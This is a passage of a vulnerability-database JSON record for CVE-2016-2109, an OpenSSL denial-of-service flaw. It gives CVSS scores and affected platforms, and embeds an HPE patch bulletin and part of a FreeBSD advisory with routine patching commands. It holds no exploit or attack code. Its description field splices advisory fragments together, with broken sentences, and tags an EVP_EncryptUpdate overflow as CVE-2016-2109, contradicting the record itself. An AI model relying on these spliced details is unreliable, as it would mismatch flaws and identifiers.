"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2109" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Brian Carpenter", "sources": [ { "db": "BID", "id": "87940" }, { "db": "CNNVD", "id": "CNNVD-201605-083" } ], "trust": 0.9 }, "cve": "CVE-2016-2109", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 7.8, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2109", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2109", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2109", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201605-083", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-2109", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2109" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "CNNVD", "id": "CNNVD-201605-083" }, { "db": "NVD", "id": "CVE-2016-2109" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. OpenSSL is prone to a local denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application or consume excessive amount of data, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03756en_us\nVersion: 1\n\nHPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-06-05\nLast Updated: 2017-06-05\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nnetwork products including Comware 7, iMC, and VCX. The vulnerabilities could\nbe remotely exploited resulting in Denial of Service (DoS) or disclosure of\nsensitive information. \n\nReferences:\n\n - CVE-2016-2105 - Remote Denial of Service (DoS)\n - CVE-2016-2106 - Remote Denial of Service (DoS)\n - CVE-2016-2107 - Remote disclosure of sensitive information\n - CVE-2016-2108 - Remote Denial of Service (DoS)\n - CVE-2016-2109 - Remote Denial of Service (DoS)\n - CVE-2016-2176 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n - Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HP Intelligent Management Center (iMC) All versions - Please refer to the\nRESOLUTION below for a list of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2108\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-2176\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities in the Comware 7, iMC and VCX products running OpenSSL. \n\n**COMWARE 7 Products**\n\n + 12500 (Comware 7) - Version: R7377P02\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 10500 (Comware 7) - Version: R7184\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5900/5920 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR1000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR2000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR3000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR4000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + VSR (Comware 7) - Version: E0324\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7900 (Comware 7) - Version: R2152\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130 (Comware 7) - Version: R3115\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6125XLG - Version: R2422P02\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6127XLG - Version: R2422P02\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + Moonshot - Version: R2432\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5700 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5930 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 1950 (Comware 7) - Version: R3115\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7500 (Comware 7) - Version: R7184\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5510HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5940 - Version: R2509\n * HP Network Products\n - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n - JH397A HPE FlexFabric 5940 2-slot Switch\n - JH398A HPE FlexFabric 5940 4-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5950 - Version: R6123\n * HP Network Products\n - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n - JH404A HPE FlexFabric 5950 4-slot Switch\n + 12900E (Comware 7) - Version: R2609\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**iMC Products**\n\n + iNode PC 7.2 (E0410) - Version: 7.2 E0410\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n + iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**VCX Products**\n\n + VCX - Version: 9.8.19\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 2 June 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \nCorrected: 2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE)\n 2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2)\n 2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16)\n 2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33)\n 2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE)\n 2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41)\nCVE Name: CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109,\n CVE-2016-2176\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII. Problem Description\n\nThe padding check in AES-NI CBC MAC was rewritten to be in constant time\nby making sure that always the same bytes are read and compared against\neither the MAC or padding bytes. But it no longer checked that there was\nenough data to have both the MAC and padding bytes. [CVE-2016-2107]\n\nAn overflow can occur in the EVP_EncodeUpdate() function which is used for\nBase64 encoding of binary data. [CVE-2016-2105]\n\nAn overflow can occur in the EVP_EncryptUpdate() function, however it is\nbelieved that there can be no overflows in internal code due to this problem. \n[CVE-2016-2109]\n\nASN1 Strings that are over 1024 bytes can cause an overread in applications\nusing the X509_NAME_oneline() function on EBCDIC systems. [CVE-2016-2176]\nFreeBSD does not run on any EBCDIC systems and therefore is not affected. \n\nIII. [CVE-2016-2109] TLS applications are not affected. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nRestart all daemons that use the library, or reboot the system. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nRestart all daemons that use the library, or reboot the system. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.x]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc\n# gpg --verify openssl-10.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all daemons that use the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/9/ r299053\nreleng/9.3/ r299068\nstable/10/ r298999\nreleng/10.1/ 